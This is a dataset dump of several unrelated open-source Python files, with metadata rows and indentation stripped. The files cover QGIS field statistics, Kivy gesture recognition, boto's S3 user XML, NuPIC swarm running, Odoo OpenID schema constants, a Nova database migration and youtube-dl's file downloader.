def displayName(self):
return self.tr('Basic statistics for fields')
def processAlgorithm(self, parameters, context, feedback):
source = self.parameterAsSource(parameters, self.INPUT_LAYER, context)
if source is None:
raise QgsProcessingException(self.invalidSourceError(parameters, self.INPUT_LAYER))
field_name = self.parameterAsString(parameters, self.FIELD_NAME, context)
field = source.fields().at(source.fields().lookupField(field_name))
output_file = self.parameterAsFileOutput(parameters, self.OUTPUT_HTML_FILE, context)
request = QgsFeatureRequest().setFlags(QgsFeatureRequest.NoGeometry).setSubsetOfAttributes([field_name],
source.fields())
features = source.getFeatures(request, QgsProcessingFeatureSource.FlagSkipGeometryValidityChecks)
count = source.featureCount()
data = []
data.append(self.tr('Analyzed field: {}').format(field_name))
results = {}
if field.isNumeric():
d, results = self.calcNumericStats(features, feedback, field, count)
data.extend(d)
elif field.type() in (QVariant.Date, QVariant.Time, QVariant.DateTime):
d, results = self.calcDateTimeStats(features, feedback, field, count)
data.extend(d)
else:
d, results = self.calcStringStats(features, feedback, field, count)
data.extend(d)
if output_file:
self.createHTML(output_file, data)
results[self.OUTPUT_HTML_FILE] = output_file
return results
def calcNumericStats(self, features, feedback, field, count):
total = 100.0 / count if count else 0
stat = QgsStatisticalSummary()
for current, ft in enumerate(features):
if feedback.isCanceled():
break
stat.addVariant(ft[field.name()])
feedback.setProgress(int(current * total))
stat.finalize()
cv = stat.stDev() / stat.mean() if stat.mean() != 0 else 0
results = {self.COUNT: stat.count(),
self.UNIQUE: stat.variety(),
self.EMPTY: stat.countMissing(),
self.FILLED: count - stat.countMissing(),
self.MIN: stat.min(),
self.MAX: stat.max(),
self.RANGE: stat.range(),
self.SUM: stat.sum(),
self.MEAN: stat.mean(),
self.MEDIAN: stat.median(),
self.STD_DEV: stat.stDev(),
self.CV: cv,
self.MINORITY: stat.minority(),
self.MAJORITY: stat.majority(),
self.FIRSTQUARTILE: stat.firstQuartile(),
self.THIRDQUARTILE: stat.thirdQuartile(),
self.IQR: stat.interQuartileRange()}
data = []
data.append(self.tr('Count: {}').format(stat.count()))
data.append(self.tr('Unique values: {}').format(stat.variety()))
data.append(self.tr('NULL (missing) values: {}').format(stat.countMissing()))
data.append(self.tr('Minimum value: {}').format(stat.min()))
data.append(self.tr('Maximum value: {}').format(stat.max()))
data.append(self.tr('Range: {}').format(stat.range()))
data.append(self.tr('Sum: {}').format(stat.sum()))
data.append(self.tr('Mean value: {}').format(stat.mean()))
data.append(self.tr('Median value: {}').format(stat.median()))
data.append(self.tr('Standard deviation: {}').format(stat.stDev()))
data.append(self.tr('Coefficient of Variation: {}').format(cv))
data.append(self.tr('Minority (rarest occurring value): {}').format(stat.minority()))
data.append(self.tr('Majority (most frequently occurring value): {}').format(stat.majority()))
data.append(self.tr('First quartile: {}').format(stat.firstQuartile()))
data.append(self.tr('Third quartile: {}').format(stat.thirdQuartile()))
data.append(self.tr('Interquartile Range (IQR): {}').format(stat.interQuartileRange()))
return data, results
def calcStringStats(self, features, feedback, field, count):
total = 100.0 / count if count else 1
stat = QgsStringStatisticalSummary()
for current, ft in enumerate(features):
if feedback.isCanceled():
break
stat.addValue(ft[field.name()])
feedback.setProgress(int(current * total))
stat.finalize()
results = {self.COUNT: stat.count(),
self.UNIQUE: stat.countDistinct(),
self.EMPTY: stat.countMissing(),
self.FILLED: stat.count() - stat.countMissing(),
self.MIN: stat.min(),
self.MAX: stat.max(),
self.MIN_LENGTH: stat.minLength(),
self.MAX_LENGTH: stat.maxLength(),
self.MEAN_LENGTH: stat.meanLength()}
data = []
data.append(self.tr('Count: {}').format(count))
data.append(self.tr('Unique values: {}').format(stat.countDistinct()))
data.append(self.tr('NULL (missing) values: {}').format(stat.countMissing()))
data.append(self.tr('Minimum value: {}').format(stat.min()))
data.append(self.tr('Maximum value: {}').format(stat.max()))
data.append(self.tr('Minimum length: {}').format(stat.minLength()))
data.append(self.tr('Maximum length: {}').format(stat.maxLength()))
data.append(self.tr('Mean length: {}').format(stat.meanLength()))
return data, results
def calcDateTimeStats(self, features, feedback, field, count):
total = 100.0 / count if count else 1
stat = QgsDateTimeStatisticalSummary()
for current, ft in enumerate(features):
if feedback.isCanceled():
break
stat.addValue(ft[field.name()])
feedback.setProgress(int(current * total))
stat.finalize()
results = {self.COUNT: stat.count(),
self.UNIQUE: stat.countDistinct(),
self.EMPTY: stat.countMissing(),
self.FILLED: stat.count() - stat.countMissing(),
self.MIN: stat.statistic(QgsDateTimeStatisticalSummary.Min),
self.MAX: stat.statistic(QgsDateTimeStatisticalSummary.Max)}
data = []
data.append(self.tr('Count: {}').format(count))
data.append(self.tr('Unique values: {}').format(stat.countDistinct()))
data.append(self.tr('NULL (missing) values: {}').format(stat.countMissing()))
data.append(
self.tr('Minimum value: {}').format(field.displayString(stat.statistic(QgsDateTimeStatisticalSummary.Min))))
data.append(
self.tr('Maximum value: {}').format(field.displayString(stat.statistic(QgsDateTimeStatisticalSummary.Max))))
return data, results
def createHTML(self, outputFile, algData):
with codecs.open(outputFile, 'w', encoding='utf-8') as f:
f.write('<html><head>\n')
f.write('<meta http-equiv="Content-Type" content="text/html; \
charset=utf-8" /></head><body>\n')
for s in algData:
f.write('<p>' + str(s) + '</p>\n')
f.write('</body></html>\n')
| gpl-2.0 | -4,264,691,436,051,176,400 | 45.954225 | 133 | 0.583952 | false |
manashmndl/kivy | kivy/gesture.py | 50 | 14632 | '''
Gesture recognition
===================
This class allows you to easily create new
gestures and compare them::
from kivy.gesture import Gesture, GestureDatabase
# Create a gesture
g = Gesture()
g.add_stroke(point_list=[(1,1), (3,4), (2,1)])
g.normalize()
# Add it to the database
gdb = GestureDatabase()
gdb.add_gesture(g)
# And for the next gesture, try to find it!
g2 = Gesture()
# ...
gdb.find(g2)
.. warning::
You don't really want to do this: it's more of an example of how
to construct gestures dynamically. Typically, you would
need a lot more points, so it's better to record gestures in a file and
reload them to compare later. Look in the examples/gestures directory for
an example of how to do that.
'''
__all__ = ('Gesture', 'GestureDatabase', 'GesturePoint', 'GestureStroke')
import pickle
import base64
import zlib
import math
from kivy.vector import Vector
from io import BytesIO
class GestureDatabase(object):
'''Class to handle a gesture database.'''
def __init__(self):
self.db = []
def add_gesture(self, gesture):
'''Add a new gesture to the database.'''
self.db.append(gesture)
def find(self, gesture, minscore=0.9, rotation_invariant=True):
'''Find a matching gesture in the database.'''
if not gesture:
return
best = None
bestscore = minscore
for g in self.db:
score = g.get_score(gesture, rotation_invariant)
if score < bestscore:
continue
bestscore = score
best = g
if not best:
return
return (bestscore, best)
def gesture_to_str(self, gesture):
'''Convert a gesture into a unique string.'''
io = BytesIO()
p = pickle.Pickler(io)
p.dump(gesture)
data = base64.b64encode(zlib.compress(io.getvalue(), 9))
return data
def str_to_gesture(self, data):
'''Convert a unique string to a gesture.'''
io = BytesIO(zlib.decompress(base64.b64decode(data)))
p = pickle.Unpickler(io)
gesture = p.load()
return gesture
class GesturePoint:
def __init__(self, x, y):
'''Stores the x,y coordinates of a point in the gesture.'''
self.x = float(x)
self.y = float(y)
def scale(self, factor):
''' Scales the point by the given factor.'''
self.x *= factor
self.y *= factor
return self
def __repr__(self):
return 'Mouse_point: %f,%f' % (self.x, self.y)
class GestureStroke:
''' Gestures can be made up of multiple strokes.'''
def __init__(self):
''' A stroke in the gesture.'''
self.points = list()
self.screenpoints = list()
# These return the min and max coordinates of the stroke
@property
def max_x(self):
if len(self.points) == 0:
return 0
return max(self.points, key=lambda pt: pt.x).x
@property
def min_x(self):
if len(self.points) == 0:
return 0
return min(self.points, key=lambda pt: pt.x).x
@property
def max_y(self):
if len(self.points) == 0:
return 0
return max(self.points, key=lambda pt: pt.y).y
@property
def min_y(self):
if len(self.points) == 0:
return 0
return min(self.points, key=lambda pt: pt.y).y
def add_point(self, x, y):
'''
add_point(x=x_pos, y=y_pos)
Adds a point to the stroke.
'''
self.points.append(GesturePoint(x, y))
self.screenpoints.append((x, y))
def scale_stroke(self, scale_factor):
'''
scale_stroke(scale_factor=float)
Scales the stroke down by scale_factor.
'''
self.points = [pt.scale(scale_factor) for pt in self.points]
def points_distance(self, point1, point2):
'''
points_distance(point1=GesturePoint, point2=GesturePoint)
Returns the distance between two GesturePoints.
'''
x = point1.x - point2.x
y = point1.y - point2.y
return math.sqrt(x * x + y * y)
def stroke_length(self, point_list=None):
'''Finds the length of the stroke. If a point list is given,
finds the length of that list.
'''
if point_list is None:
point_list = self.points
gesture_length = 0.0
if len(point_list) <= 1: # If there is only one point -> no length
return gesture_length
for i in range(len(point_list) - 1):
gesture_length += self.points_distance(
point_list[i], point_list[i + 1])
return gesture_length
def normalize_stroke(self, sample_points=32):
'''Normalizes strokes so that every stroke has a standard number of
points. Returns True if stroke is normalized, False if it can't be
normalized. sample_points controls the resolution of the stroke.
'''
# If there is only one point or the length is 0, don't normalize
if len(self.points) <= 1 or self.stroke_length(self.points) == 0.0:
return False
# Calculate how long each point should be in the stroke
target_stroke_size = \
self.stroke_length(self.points) / float(sample_points)
new_points = list()
new_points.append(self.points[0])
# We loop on the points
prev = self.points[0]
src_distance = 0.0
dst_distance = target_stroke_size
for curr in self.points[1:]:
d = self.points_distance(prev, curr)
if d > 0:
prev = curr
src_distance = src_distance + d
# The new point need to be inserted into the
# segment [prev, curr]
while dst_distance < src_distance:
x_dir = curr.x - prev.x
y_dir = curr.y - prev.y
ratio = (src_distance - dst_distance) / d
to_x = x_dir * ratio + prev.x
to_y = y_dir * ratio + prev.y
new_points.append(GesturePoint(to_x, to_y))
dst_distance = self.stroke_length(self.points) / \
float(sample_points) * len(new_points)
# If this happens, we are into troubles...
if not len(new_points) == sample_points:
raise ValueError('Invalid number of strokes points; got '
'%d while it should be %d' %
(len(new_points), sample_points))
self.points = new_points
return True
def center_stroke(self, offset_x, offset_y):
'''Centers the stroke by offseting the points.'''
for point in self.points:
point.x -= offset_x
point.y -= offset_y
class Gesture:
'''A python implementation of a gesture recognition algorithm by
Oleg Dopertchouk: http://www.gamedev.net/reference/articles/article2039.asp
Implemented by Jeiel Aranal ([email protected]),
released into the public domain.
'''
# Tolerance for evaluation using the '==' operator
DEFAULT_TOLERANCE = 0.1
def __init__(self, tolerance=None):
'''
Gesture([tolerance=float])
Creates a new gesture with an optional matching tolerance value.
'''
self.width = 0.
self.height = 0.
self.gesture_product = 0.
self.strokes = list()
if tolerance is None:
self.tolerance = Gesture.DEFAULT_TOLERANCE
else:
self.tolerance = tolerance
def _scale_gesture(self):
''' Scales down the gesture to a unit of 1.'''
# map() creates a list of min/max coordinates of the strokes
# in the gesture and min()/max() pulls the lowest/highest value
min_x = min([stroke.min_x for stroke in self.strokes])
max_x = max([stroke.max_x for stroke in self.strokes])
min_y = min([stroke.min_y for stroke in self.strokes])
max_y = max([stroke.max_y for stroke in self.strokes])
x_len = max_x - min_x
self.width = x_len
y_len = max_y - min_y
self.height = y_len
scale_factor = max(x_len, y_len)
if scale_factor <= 0.0:
return False
scale_factor = 1.0 / scale_factor
for stroke in self.strokes:
stroke.scale_stroke(scale_factor)
return True
def _center_gesture(self):
''' Centers the Gesture.points of the gesture.'''
total_x = 0.0
total_y = 0.0
total_points = 0
for stroke in self.strokes:
# adds up all the points inside the stroke
stroke_y = sum([pt.y for pt in stroke.points])
stroke_x = sum([pt.x for pt in stroke.points])
total_y += stroke_y
total_x += stroke_x
total_points += len(stroke.points)
if total_points == 0:
return False
# Average to get the offset
total_x /= total_points
total_y /= total_points
# Apply the offset to the strokes
for stroke in self.strokes:
stroke.center_stroke(total_x, total_y)
return True
def add_stroke(self, point_list=None):
'''Adds a stroke to the gesture and returns the Stroke instance.
Optional point_list argument is a list of the mouse points for
the stroke.
'''
self.strokes.append(GestureStroke())
if isinstance(point_list, list) or isinstance(point_list, tuple):
for point in point_list:
if isinstance(point, GesturePoint):
self.strokes[-1].points.append(point)
elif isinstance(point, list) or isinstance(point, tuple):
if len(point) != 2:
raise ValueError("Stroke entry must have 2 values max")
self.strokes[-1].add_point(point[0], point[1])
else:
raise TypeError("The point list should either be "
"tuples of x and y or a list of "
"GesturePoint objects")
elif point_list is not None:
raise ValueError("point_list should be a tuple/list")
return self.strokes[-1]
def normalize(self, stroke_samples=32):
'''Runs the gesture normalization algorithm and calculates the dot
product with self.
'''
if not self._scale_gesture() or not self._center_gesture():
self.gesture_product = False
return False
for stroke in self.strokes:
stroke.normalize_stroke(stroke_samples)
self.gesture_product = self.dot_product(self)
def get_rigid_rotation(self, dstpts):
'''
Extract the rotation to apply to a group of points to minimize the
distance to a second group of points. The two groups of points are
assumed to be centered. This is a simple version that just picks
an angle based on the first point of the gesture.
'''
if len(self.strokes) < 1 or len(self.strokes[0].points) < 1:
return 0
if len(dstpts.strokes) < 1 or len(dstpts.strokes[0].points) < 1:
return 0
p = dstpts.strokes[0].points[0]
target = Vector([p.x, p.y])
source = Vector([p.x, p.y])
return source.angle(target)
def dot_product(self, comparison_gesture):
''' Calculates the dot product of the gesture with another gesture.'''
if len(comparison_gesture.strokes) != len(self.strokes):
return -1
if getattr(comparison_gesture, 'gesture_product', True) is False or \
getattr(self, 'gesture_product', True) is False:
return -1
dot_product = 0.0
for stroke_index, (my_stroke, cmp_stroke) in enumerate(
list(zip(self.strokes, comparison_gesture.strokes))):
for pt_index, (my_point, cmp_point) in enumerate(
list(zip(my_stroke.points, cmp_stroke.points))):
dot_product += (my_point.x * cmp_point.x +
my_point.y * cmp_point.y)
return dot_product
def rotate(self, angle):
g = Gesture()
for stroke in self.strokes:
tmp = []
for j in stroke.points:
v = Vector([j.x, j.y]).rotate(angle)
tmp.append(v)
g.add_stroke(tmp)
g.gesture_product = g.dot_product(g)
return g
def get_score(self, comparison_gesture, rotation_invariant=True):
''' Returns the matching score of the gesture against another gesture.
'''
if isinstance(comparison_gesture, Gesture):
if rotation_invariant:
# get orientation
angle = self.get_rigid_rotation(comparison_gesture)
# rotate the gesture to be in the same frame.
comparison_gesture = comparison_gesture.rotate(angle)
# this is the normal "orientation" code.
score = self.dot_product(comparison_gesture)
if score <= 0:
return score
score /= math.sqrt(
self.gesture_product * comparison_gesture.gesture_product)
return score
def __eq__(self, comparison_gesture):
''' Allows easy comparisons between gesture instances.'''
if isinstance(comparison_gesture, Gesture):
# If the gestures don't have the same number of strokes, its
# definitely not the same gesture
score = self.get_score(comparison_gesture)
if (score > (1.0 - self.tolerance) and
score < (1.0 + self.tolerance)):
return True
else:
return False
else:
return NotImplemented
def __ne__(self, comparison_gesture):
result = self.__eq__(comparison_gesture)
if result is NotImplemented:
return result
else:
return not result
def __lt__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with <")
def __gt__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with >")
def __le__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with <=")
def __ge__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with >=")
| mit | 5,757,994,173,714,974,000 | 33.509434 | 79 | 0.567387 | false |
chenc10/Spark-PAF | ec2/lib/boto-2.34.0/boto/s3/user.py | 171 | 1968 | # Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class User(object):
def __init__(self, parent=None, id='', display_name=''):
if parent:
parent.owner = self
self.type = None
self.id = id
self.display_name = display_name
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'DisplayName':
self.display_name = value
elif name == 'ID':
self.id = value
else:
setattr(self, name, value)
def to_xml(self, element_name='Owner'):
if self.type:
s = '<%s xsi:type="%s">' % (element_name, self.type)
else:
s = '<%s>' % element_name
s += '<ID>%s</ID>' % self.id
s += '<DisplayName>%s</DisplayName>' % self.display_name
s += '</%s>' % element_name
return s
| apache-2.0 | 4,328,289,422,621,144,600 | 39.163265 | 74 | 0.655488 | false |
pulinagrawal/nupic | scripts/run_swarm.py | 9 | 7871 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
""" @file run_swarm.py
This script is the command-line interface for running swarms in nupic."""
import sys
import os
import optparse
from nupic.swarming import permutations_runner
from nupic.swarming.permutations_runner import DEFAULT_OPTIONS
def runPermutations(args):
"""
The main function of the RunPermutations utility.
This utility will automatically generate and run multiple prediction framework
experiments that are permutations of a base experiment via the Grok engine.
For example, if you have an experiment that you want to test with 3 possible
values of variable A and 2 possible values of variable B, this utility will
automatically generate the experiment directories and description files for
each of the 6 different experiments.
Here is an example permutations file which is read by this script below. The
permutations file must be in the same directory as the description.py for the
base experiment that you want to permute. It contains a permutations dict, an
optional list of the result items to report on for each experiment, and an
optional result item to optimize for.
When an 'optimize' entry is provided, this tool will attempt to prioritize the
order in which the various permutations are run in order to improve the odds
of running the best permutations sooner. It does this by watching the results
for various parameter values and putting parameter values that give generally
better results at the head of the queue.
In addition, when the optimize key is provided, we periodically update the UI
with the best results obtained so far on that metric.
---------------------------------------------------------------------------
permutations = dict(
iterationCount = [1000, 5000],
coincCount = [50, 100],
trainTP = [False],
)
report = ['.*reconstructErrAvg',
'.*inputPredScore.*',
]
optimize = 'postProc_gym1_baseline:inputPredScore'
Parameters:
----------------------------------------------------------------------
args: Command-line args; the equivalent of sys.argv[1:]
retval: for the actions 'run', 'pickup', and 'dryRun', returns the
Hypersearch job ID (in ClinetJobs table); otherwise returns
None
"""
helpString = (
"\n\n%prog [options] permutationsScript\n"
"%prog [options] expDescription.json\n\n"
"This script runs permutations of an experiment via Grok engine, as "
"defined in a\npermutations.py script or an expGenerator experiment "
"description json file.\nIn the expDescription.json form, the json file "
"MUST have the file extension\n'.json' and MUST conform to "
"expGenerator/experimentDescriptionSchema.json.")
parser = optparse.OptionParser(usage=helpString)
parser.add_option(
"--replaceReport", dest="replaceReport", action="store_true",
default=DEFAULT_OPTIONS["replaceReport"],
help="Replace existing csv report file if it exists. Default is to "
"append to the existing file. [default: %default].")
parser.add_option(
"--action", dest="action", default=DEFAULT_OPTIONS["action"],
choices=["run", "pickup", "report", "dryRun"],
help="Which action to perform. Possible actions are run, pickup, choices, "
"report, list. "
"run: run a new HyperSearch via Grok. "
"pickup: pick up the latest run of a HyperSearch job. "
"dryRun: run a single HypersearchWorker inline within the application "
"process without the Grok infrastructure to flush out bugs in "
"description and permutations scripts; defaults to "
"maxPermutations=1: use --maxPermutations to change this; "
"report: just print results from the last or current run. "
"[default: %default].")
parser.add_option(
"--maxPermutations", dest="maxPermutations",
default=DEFAULT_OPTIONS["maxPermutations"], type="int",
help="Maximum number of models to search. Applies only to the 'run' and "
"'dryRun' actions. [default: %default].")
parser.add_option(
"--exports", dest="exports", default=DEFAULT_OPTIONS["exports"],
type="string",
help="json dump of environment variable settings that should be applied"
"for the job before running. [default: %default].")
parser.add_option(
"--useTerminators", dest="useTerminators", action="store_true",
default=DEFAULT_OPTIONS["useTerminators"], help="Use early model terminators in HyperSearch"
"[default: %default].")
parser.add_option(
"--maxWorkers", dest="maxWorkers", default=DEFAULT_OPTIONS["maxWorkers"],
type="int",
help="Maximum number of concurrent workers to launch. Applies only to "
"the 'run' action. [default: %default].")
parser.add_option(
"-v", dest="verbosityCount", action="count", default=0,
help="Increase verbosity of the output. Specify multiple times for "
"increased verbosity. e.g., -vv is more verbose than -v.")
parser.add_option(
"--timeout", dest="timeout", default=DEFAULT_OPTIONS["timeout"], type="int",
help="Time out for this search in minutes"
"[default: %default].")
parser.add_option(
"--overwrite", default=DEFAULT_OPTIONS["overwrite"], action="store_true",
help="If 'yes', overwrite existing description.py and permutations.py"
" (in the same directory as the <expDescription.json> file) if they"
" already exist. [default: %default].")
parser.add_option(
"--genTopNDescriptions", dest="genTopNDescriptions",
default=DEFAULT_OPTIONS["genTopNDescriptions"], type="int",
help="Generate description files for the top N models. Each one will be"
" placed into it's own subdirectory under the base description file."
"[default: %default].")
(options, positionalArgs) = parser.parse_args(args)
# Get the permutations script's filepath
if len(positionalArgs) != 1:
parser.error("You must supply the name of exactly one permutations script "
"or JSON description file.")
fileArgPath = os.path.expanduser(positionalArgs[0])
fileArgPath = os.path.expandvars(fileArgPath)
fileArgPath = os.path.abspath(fileArgPath)
permWorkDir = os.path.dirname(fileArgPath)
outputLabel = os.path.splitext(os.path.basename(fileArgPath))[0]
basename = os.path.basename(fileArgPath)
fileExtension = os.path.splitext(basename)[1]
optionsDict = vars(options)
if fileExtension == ".json":
returnValue = permutations_runner.runWithJsonFile(
fileArgPath, optionsDict, outputLabel, permWorkDir)
else:
returnValue = permutations_runner.runWithPermutationsScript(
fileArgPath, optionsDict, outputLabel, permWorkDir)
return returnValue
if __name__ == "__main__":
runPermutations(sys.argv[1:])
| agpl-3.0 | 2,867,927,407,687,574,000 | 41.317204 | 96 | 0.677423 | false |
alqfahad/odoo | addons/auth_openid/utils.py | 428 | 1589 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010-2012 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
KEY_LENGTH = 16
SREG2AX = { # from http://www.axschema.org/types/#sreg
'nickname': 'http://axschema.org/namePerson/friendly',
'email': 'http://axschema.org/contact/email',
'fullname': 'http://axschema.org/namePerson',
'dob': 'http://axschema.org/birthDate',
'gender': 'http://axschema.org/person/gender',
'postcode': 'http://axschema.org/contact/postalCode/home',
'country': 'http://axschema.org/contact/country/home',
'language': 'http://axschema.org/pref/language',
'timezone': 'http://axschema.org/pref/timezone',
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 3,679,406,192,559,422,000 | 44.4 | 78 | 0.631215 | false |
TwinkleChawla/nova | nova/db/sqlalchemy/migrate_repo/versions/300_migration_context.py | 44 | 1117 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import Column
from sqlalchemy import MetaData
from sqlalchemy import Table
from sqlalchemy import Text
BASE_TABLE_NAME = 'instance_extra'
NEW_COLUMN_NAME = 'migration_context'
def upgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
for prefix in ('', 'shadow_'):
table = Table(prefix + BASE_TABLE_NAME, meta, autoload=True)
new_column = Column(NEW_COLUMN_NAME, Text, nullable=True)
if not hasattr(table.c, NEW_COLUMN_NAME):
table.create_column(new_column)
| apache-2.0 | 2,894,455,576,971,951,000 | 33.90625 | 78 | 0.709937 | false |
msingh172/youtube-dl | youtube_dl/downloader/common.py | 95 | 13848 | from __future__ import division, unicode_literals
import os
import re
import sys
import time
from ..compat import compat_str
from ..utils import (
encodeFilename,
decodeArgument,
format_bytes,
timeconvert,
)
class FileDownloader(object):
"""File Downloader class.
File downloader objects are the ones responsible of downloading the
actual video file and writing it to disk.
File downloaders accept a lot of parameters. In order not to saturate
the object constructor with arguments, it receives a dictionary of
options instead.
Available options:
verbose: Print additional info to stdout.
quiet: Do not print messages to stdout.
ratelimit: Download speed limit, in bytes/sec.
retries: Number of times to retry for HTTP error 5xx
buffersize: Size of download buffer in bytes.
noresizebuffer: Do not automatically resize the download buffer.
continuedl: Try to continue downloads if possible.
noprogress: Do not print the progress bar.
logtostderr: Log messages to stderr instead of stdout.
consoletitle: Display progress in console window's titlebar.
nopart: Do not use temporary .part files.
updatetime: Use the Last-modified header to set output file timestamps.
test: Download only first bytes to test the downloader.
min_filesize: Skip files smaller than this size
max_filesize: Skip files larger than this size
xattr_set_filesize: Set ytdl.filesize user xattribute with expected size.
(experimenatal)
external_downloader_args: A list of additional command-line arguments for the
external downloader.
Subclasses of this one must re-define the real_download method.
"""
_TEST_FILE_SIZE = 10241
params = None
def __init__(self, ydl, params):
"""Create a FileDownloader object with the given options."""
self.ydl = ydl
self._progress_hooks = []
self.params = params
self.add_progress_hook(self.report_progress)
@staticmethod
def format_seconds(seconds):
(mins, secs) = divmod(seconds, 60)
(hours, mins) = divmod(mins, 60)
if hours > 99:
return '--:--:--'
if hours == 0:
return '%02d:%02d' % (mins, secs)
else:
return '%02d:%02d:%02d' % (hours, mins, secs)
@staticmethod
def calc_percent(byte_counter, data_len):
if data_len is None:
return None
return float(byte_counter) / float(data_len) * 100.0
@staticmethod
def format_percent(percent):
if percent is None:
return '---.-%'
return '%6s' % ('%3.1f%%' % percent)
@staticmethod
def calc_eta(start, now, total, current):
if total is None:
return None
if now is None:
now = time.time()
dif = now - start
if current == 0 or dif < 0.001: # One millisecond
return None
rate = float(current) / dif
return int((float(total) - float(current)) / rate)
@staticmethod
def format_eta(eta):
if eta is None:
return '--:--'
return FileDownloader.format_seconds(eta)
@staticmethod
def calc_speed(start, now, bytes):
dif = now - start
if bytes == 0 or dif < 0.001: # One millisecond
return None
return float(bytes) / dif
@staticmethod
def format_speed(speed):
if speed is None:
return '%10s' % '---b/s'
return '%10s' % ('%s/s' % format_bytes(speed))
@staticmethod
def best_block_size(elapsed_time, bytes):
new_min = max(bytes / 2.0, 1.0)
new_max = min(max(bytes * 2.0, 1.0), 4194304) # Do not surpass 4 MB
if elapsed_time < 0.001:
return int(new_max)
rate = bytes / elapsed_time
if rate > new_max:
return int(new_max)
if rate < new_min:
return int(new_min)
return int(rate)
@staticmethod
def parse_bytes(bytestr):
"""Parse a string indicating a byte quantity into an integer."""
matchobj = re.match(r'(?i)^(\d+(?:\.\d+)?)([kMGTPEZY]?)$', bytestr)
if matchobj is None:
return None
number = float(matchobj.group(1))
multiplier = 1024.0 ** 'bkmgtpezy'.index(matchobj.group(2).lower())
return int(round(number * multiplier))
def to_screen(self, *args, **kargs):
self.ydl.to_screen(*args, **kargs)
def to_stderr(self, message):
self.ydl.to_screen(message)
def to_console_title(self, message):
self.ydl.to_console_title(message)
def trouble(self, *args, **kargs):
self.ydl.trouble(*args, **kargs)
def report_warning(self, *args, **kargs):
self.ydl.report_warning(*args, **kargs)
def report_error(self, *args, **kargs):
self.ydl.report_error(*args, **kargs)
def slow_down(self, start_time, now, byte_counter):
"""Sleep if the download speed is over the rate limit."""
rate_limit = self.params.get('ratelimit', None)
if rate_limit is None or byte_counter == 0:
return
if now is None:
now = time.time()
elapsed = now - start_time
if elapsed <= 0.0:
return
speed = float(byte_counter) / elapsed
if speed > rate_limit:
time.sleep(max((byte_counter // rate_limit) - elapsed, 0))
def temp_name(self, filename):
"""Returns a temporary filename for the given filename."""
if self.params.get('nopart', False) or filename == '-' or \
(os.path.exists(encodeFilename(filename)) and not os.path.isfile(encodeFilename(filename))):
return filename
return filename + '.part'
def undo_temp_name(self, filename):
if filename.endswith('.part'):
return filename[:-len('.part')]
return filename
def try_rename(self, old_filename, new_filename):
try:
if old_filename == new_filename:
return
os.rename(encodeFilename(old_filename), encodeFilename(new_filename))
except (IOError, OSError) as err:
self.report_error('unable to rename file: %s' % compat_str(err))
def try_utime(self, filename, last_modified_hdr):
"""Try to set the last-modified time of the given file."""
if last_modified_hdr is None:
return
if not os.path.isfile(encodeFilename(filename)):
return
timestr = last_modified_hdr
if timestr is None:
return
filetime = timeconvert(timestr)
if filetime is None:
return filetime
# Ignore obviously invalid dates
if filetime == 0:
return
try:
os.utime(filename, (time.time(), filetime))
except Exception:
pass
return filetime
def report_destination(self, filename):
"""Report destination filename."""
self.to_screen('[download] Destination: ' + filename)
def _report_progress_status(self, msg, is_last_line=False):
fullmsg = '[download] ' + msg
if self.params.get('progress_with_newline', False):
self.to_screen(fullmsg)
else:
if os.name == 'nt':
prev_len = getattr(self, '_report_progress_prev_line_length',
0)
if prev_len > len(fullmsg):
fullmsg += ' ' * (prev_len - len(fullmsg))
self._report_progress_prev_line_length = len(fullmsg)
